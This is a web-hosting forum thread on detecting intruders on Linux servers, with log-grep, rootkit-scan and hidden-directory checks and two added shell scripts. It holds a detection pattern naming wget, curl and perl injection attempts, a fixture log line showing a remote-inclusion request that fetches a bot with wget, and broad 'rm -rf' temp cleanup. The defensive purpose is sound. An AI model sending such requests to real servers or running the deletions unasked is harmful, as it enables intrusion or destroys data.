Page 1 of 2 12 LastLast
Results 1 to 25 of 28
  1. #1
    Join Date
    Apr 2006
    Posts
    520

    How to detect a possible intruder?

    Advice: these are steps compiled from the network and from some books; they were not written by me.

    Hello..

    I have a few incomplete steps to check whether there is an intruder in my Linux system, but I would really like to have all your suggestions to make a good doc about this matter, so please post your tips and tricks on this subject.

    1.- Download and run Rkhunter & Chkrootkit
    2.- Run "w" and "netstat -nalp | grep SSHPORTHERE" to see who's connected using SSH
    3.- Search for ssh and ftp accepted logins.
    Code:
    last
    cat /var/log/secure* | grep ssh | grep Accept
    cat /var/log/secure* |grep ftp |grep Accept
    grep ftp /var/log/messages
    4.- Watch current connections and scan your ports.

    Code:
    netstat -nalp
    nmap -p 1-65535 localhost
    5.- Search for suspicious content in commonly exploitable dirs.

    Code:
    rm -rf /tmp/sess*
    rm -rf /var/dos-*
    rm -rf /var/tmp/ssh-*
    rm -rf /var/tmp/dos-*
    ls /tmp -lab
    ls /var/tmp -labR
    ls /dev/shm -labR
    ls /usr/local/apache/proxy -labR
    ls /usr/local/samba -labR
    6.- Check for anomalies in these files.
    Code:
    less /etc/passwd 
    less /etc/shadow
    less /etc/group
    7.- Search for new users in sudoers, check wtmp, and check that telnet is not running.

    Code:
    cat /etc/sudoers
    who /var/log/wtmp
    cat /etc/xinetd.d/telnet
    8.- Find bash history files

    Code:
    find '/' -iname .bash_history
    9.- Verify the crontab table

    Code:
    crontab -l
    10.- Update the slocate database and search for exploits.

    Code:
    updatedb &
    For cPanel servers:
    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
    For Ensim servers:
    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
    Search for shell code:

    Code:
    cat /path/of/your/web/logs/* | grep -a '\\x90'
    11.- Search for hidden dirs

    Code:
    locate "..."
    locate ".. "
    locate " .."
    locate ". "
    locate " ."
    12.- Search for perl-scripts running

    Code:
    ps aux | grep '[p]erl'
    13.- Check the nobody user and open files.

    Code:
    service httpd stop
    lsof -u nobody
    Please, add your tips and tricks about this.
    Last edited by sh4ka; 05-22-2007 at 01:51 AM.
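Added example, not code from the thread or from sh4ka: three of the steps above (3, 10 and 11) written as shell functions that take their input as arguments, so they can be pointed at a real box or, as in make_fixture here, at constructed data. Function names, the sample log lines, the IP addresses and the directory tree are all made up; the auth-log parser assumes the standard OpenSSH "Accepted <method> for <user> from <ip>" line, the web-log scanner reuses the egrep pattern from step 10 plus a literal "\x90", and the hidden-name finder goes slightly beyond step 11 by also catching the no-break space that post #24 suspects.

```shell
#!/bin/sh
# Added example, not part of the original thread. All names, log lines and
# addresses below are constructed sample data.

# Step 3: accepted SSH logins, summarised as "<count> <user> <source ip>".
# Assumes the standard OpenSSH "Accepted <method> for <user> from <ip>" line.
accepted_ssh_logins() {
  grep -h 'sshd.*Accepted' "$@" |
    awk '{ for (i = 1; i <= NF; i++) { if ($i == "for") u = $(i+1); if ($i == "from") a = $(i+1) } print u, a }' |
    sort | uniq -c | sort -rn
}

# Step 10: the thread's command-injection pattern for web logs, plus a literal
# "\x90" (the x86 NOP byte, as a sled appears when logged in escaped form).
# -a keeps grep from giving up on lines that contain raw binary.
scan_web_log() {
  grep -aEi '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20|\\x90' "$@"
}

# Step 11: names made only of dots, spaces and the no-break space (U+00A0,
# bytes C2 A0). find never prints "." or "..", so every hit was created by
# someone. Checked in the C locale so the two raw bytes match as written.
find_hidden_entries() {
  nbsp=$(printf '\302\240')
  find "$1" -mindepth 1 | LC_ALL=C grep -E "/([. ]|$nbsp)+\$"
}

# Constructed fixture: a fake auth log, a fake access log and a small tree with
# three oddly named directories. Prints the fixture's path.
make_fixture() {
  d=$(mktemp -d)
  cat > "$d/auth.log" <<'EOF'
Jan 10 03:14:07 web1 sshd[2211]: Accepted password for root from 203.0.113.9 port 51122 ssh2
Jan 10 03:14:40 web1 sshd[2230]: Failed password for root from 203.0.113.9 port 51140 ssh2
Jan 10 04:01:02 web1 sshd[2301]: Accepted publickey for deploy from 198.51.100.7 port 40022 ssh2
Jan 10 04:02:11 web1 vsftpd: CONNECT: Client "203.0.113.9"
EOF
  cat > "$d/access.log" <<'EOF'
203.0.113.9 - - [10/Jan/2008:03:10:01 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2008:03:11:15 +0000] "GET /index.php?page=http://203.0.113.9/x.txt?cmd=wget%20http://203.0.113.9/bot.pl HTTP/1.1" 200 12
198.51.100.7 - - [10/Jan/2008:03:12:00 +0000] "GET /about.html HTTP/1.1" 200 2048
203.0.113.9 - - [10/Jan/2008:03:13:44 +0000] "GET /cgi-bin/test.cgi?\x90\x90\x90\x90 HTTP/1.1" 404 220
EOF
  nbsp=$(printf '\302\240')
  mkdir -p "$d/tree/var/tmp/..." "$d/tree/tmp/. " "$d/tree/dev/shm/$nbsp" "$d/tree/tmp/sess_7f3a"
  : > "$d/tree/var/tmp/.../bot.pl"
  echo "$d"
}

# Stand-alone run: build the fixture, run the three checks, clean up.
main() {
  d=$(make_fixture)
  echo "== accepted ssh logins ==";    accepted_ssh_logins "$d/auth.log"
  echo "== suspicious web requests =="; scan_web_log "$d/access.log"
  echo "== oddly named entries ==";     find_hidden_entries "$d/tree"
  rm -rf "$d"
}
main
```

On a real host you would call the functions with the real paths (for example `accepted_ssh_logins /var/log/secure*` and `find_hidden_entries /tmp /var/tmp /dev/shm` one directory at a time) instead of the fixture; only the `make_fixture` and `main` parts are demo scaffolding.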

  2. #2
    Dude, rock'n thread. That was the single most useful thing I've read & as a relative linux noob with security issues, I have had to do a lot of Google'n.

    Beauty work. Really. Pretty much what every noob to linux security & bash needs to know to have any sort of "ability" to counter hackers. The bash_history bit was the best. So damn useful.
    Sell Digital Goods with DigiVendor
    Web Hosting Automation with PhpHostBot

  3. #3
    Join Date
    Apr 2006
    Posts
    520
    Glad to hear that.

    Here is another tip to track exploits in temp dirs; it's a bash script:

    Code:
    #!/bin/bash
    # Walk the usual drop directories and keep only entries owned by the web-server
    # accounts, plus directories, executables and .pl files. The listing goes to
    # stdout and to exploits.txt; the summary line is appended afterwards.
    # (The original ran tee inside the loop, so the file held only the last pass.)
    for x in /dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp; do
        ls -loAFR "$x" 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web " | grep -E "^$|^/|/$|\*$|\.pl$"
    done | tee exploits.txt
    echo -e "\n\nPossible Exploit Files and Directories: $(grep -Ev '^$|^/' exploits.txt | wc -l | tr -d ' ')" | tee -a exploits.txt
    I also hope to have the experts of this forum posting their rules to track hackers.
    Last edited by sh4ka; 05-22-2007 at 06:05 AM.

  4. #4
    Also try this - ossec.net

  5. #5
    Join Date
    Apr 2006
    Posts
    520
    Cool, I will test this.

    Any other suggestions ?

    Thanks

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    rm -rf /tmp/sess*
    A lot of times attackers will save their files to look similar to session files.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  7. #7
    Join Date
    Apr 2006
    Posts
    520
    Oh, thanks, I will correct that.

  8. #8
    Nice, I will put this to use, lol, you did a good job at explaining this.

  9. #9
    Join Date
    May 2004
    Posts
    98
    This is an excellent thread. Bookmarked this one.

  10. #10
    Thanks, this is very useful
    ServerTweak Networks, LLC >> ServerTweak.com
    Experience the fastest network and superior servers, feel the power of ServerTweak!
    Fremont, CA DataCenter | Dedicated Servers | Colocation | Cross Connects HE.net | 1/4 - Full Cab Sales

  11. #11
    great info! thanks

  12. #12
    Join Date
    Sep 2007
    Posts
    48
    How would you compare OSSEC to Osiris?

  13. #13
    thanks man.

    cat /path/of/your/web/logs/* |grep "/x90/"

    What does this thing do?

    Is there a script to search my whole server to see if there is a shell file?
    Chad Michael Murray >> House of Wax

  14. #14
    This is outdated...
    This can be easily bypassed using asm or binary lol.....

  15. #15
    thanks! good info!

  16. #16
    Join Date
    Jan 2008
    Location
    India
    Posts
    11
    Thanks for such an informative thread... It will help many of us.

    Good job
    Keep Smiling !!

  17. #17
    Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.

  18. #18
    Join Date
    Apr 2006
    Posts
    520
    You can always write a shell script and send the results by mail, and believe me, a good cracker already knows about all this stuff.

  19. #19
    Join Date
    Aug 2004
    Posts
    142
    This is kind of old

  20. #20
    This is kind of old
    But, still useful. Glad to have seen it once it got popped to the top of the reading list.
    edgedirector.com
    managed dns global failover and load balance (gslb)
    exactstate.com
    uptime report for webhostingtalk.com

  21. #21
    Quote Originally Posted by toby27 View Post
    thanks man.

    cat /path/of/your/web/logs/* |grep "/x90/"

    What does this thing do?

    Is there a script to search my whole server to see if there is a shell file?
    This might be an old post but... That line searches files for shell code. Shell code doesn't have anything to do with the Linux shell. It's machine code that an attacker attempts to execute on your server by using scripts or applications called "exploits". Basically, an exploit will attempt to (ab)use a vulnerability in an application (i.e. a buffer overflow vulnerability) to inject shell code (i.e. code that listens on a port and binds a Linux command line to it), which is then executed by the CPU. For more information I recommend searching Google for the article "Smashing the stack for fun and profit". It's heavy literature for newbies but it's worth reading.

    About the OP: Most of the techniques explained above are really basic and will only detect possible attacks by 'newbie script kiddies'. I recommend installing an advanced IDS such as Snort or TripWire. If you're running cPanel, install ConfigServer Firewall since its LFD tool will monitor a lot of things on your server and send you notifications via email if it detects something that you might want to look into. For those who do not use cPanel: Use LSM and BFD from R-fx Networks.

    Of course, the best way is to focus on intrusion prevention/avoidance and not only on intrusion detection.

  22. #22
    Join Date
    May 2007
    Posts
    442
    What is LSM?

    BFD = Brute force detection on APF firewall, correct?

  23. #23
    Thank you for posting this, guys!

    I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotations but it still shows up and won't go away?

    I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!

  24. #24
    Quote Originally Posted by gpl24 View Post
    What is LSM?

    BFD = Brute force detection on APF firewall, correct?
    Correct. LSM = Linux Socket Monitor.

    Quote Originally Posted by mifbody View Post
    Thank you for posting this, guys!

    I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotations but it still shows up and won't go away?

    I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!
    Maybe it's not a space but a hidden ALT+0160 character? Just guessing.

  25. #25
    Join Date
    Jun 2003
    Posts
    367
    Quote Originally Posted by wdr1 View Post
    Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.
    This is generally why you log to a secure syslog server.
    Common sense is not so common.
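Added example, not from the thread or any of its posters: a cron-friendly wrapper that collects a few of the OP's checks and hands the result to syslog the moment it is produced, which is the combination of #17, #18 and #25 (script it, get it off the box, keep the copy on a log server). The host name "loghost", the tag "intrusion-check" and the function names are assumptions; the rsyslog forwarding line quoted in the comments is standard rsyslog syntax, the rest is mine.

```shell
#!/bin/sh
# Added example, not part of the original thread. "loghost" is a placeholder
# for your own syslog collector.

# Collect the output of a few of the thread's checks into one text block.
# Every command is guarded so a tool missing on this box does not abort the run.
build_report() {
  echo "host=$(hostname) utc=$(date -u +%Y-%m-%dT%H:%M:%SZ)"
  echo "--- logged in ---";          w 2>/dev/null || true
  echo "--- listening sockets ---";  ss -tulpn 2>/dev/null || netstat -tulpn 2>/dev/null || true
  echo "--- perl processes ---";     ps axo pid,user,args 2>/dev/null | grep '[p]erl' || true
  echo "--- root crontab ---";       crontab -l 2>/dev/null || true
}

# SHA-256 of a report, so the copy that reached loghost can later be compared
# with whatever is (still) on this disk.
report_digest() {
  printf '%s\n' "$1" | sha256sum | cut -d' ' -f1
}

# Hand every line to syslog under its own tag and facility. The local syslog
# daemon must forward that facility to loghost; for rsyslog one line in
# /etc/rsyslog.d/remote.conf does it:
#     auth.*    @@loghost:514      (two @ = TCP, one @ = UDP)
# Returns 1 when no logger binary exists, so cron mails the failure instead of
# the report silently staying local.
ship_report() {
  command -v logger >/dev/null 2>&1 || return 1
  printf '%s\n' "$1" | logger -t intrusion-check -p auth.notice
}

# Entry point for cron: build, fingerprint, ship. A non-zero exit makes cron
# mail the error to the admin.
main() {
  report=$(build_report)
  report="$report
digest=$(report_digest "$report")"
  ship_report "$report" || { echo "logger not found; report kept local" >&2; return 1; }
}
main
```

Drop the file in /etc/cron.daily (or call `main` from an hourly crontab entry) and confirm on loghost that lines tagged intrusion-check arrive; the digest line is what lets you tell a report that was edited after the fact from the one that was shipped.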
